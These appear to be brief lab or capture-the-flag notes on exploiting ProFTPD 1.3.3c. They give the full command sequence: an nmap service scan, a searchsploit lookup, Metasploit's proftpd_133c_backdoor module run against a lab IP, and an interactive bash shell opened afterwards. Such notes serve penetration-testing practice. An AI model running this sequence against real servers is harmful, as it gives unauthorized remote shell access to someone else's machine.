Last updated 1 year ago
nmap -sV 192.75.64.3
PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.3c MAC Address: 02:42:C0:4B:40:03 (Unknown) Service Info: OS: Unix
searchsploit ProFTPD 1.3.3
service postgresql start && msfconsole -q
setg RHOSTS 192.75.64.3 search proftpd use exploit/unix/ftp/proftpd_133c_backdoor run
/bin/bash -i
Postgresql is started to store all metasploit loot and sensitive information from the target machine -
metasploit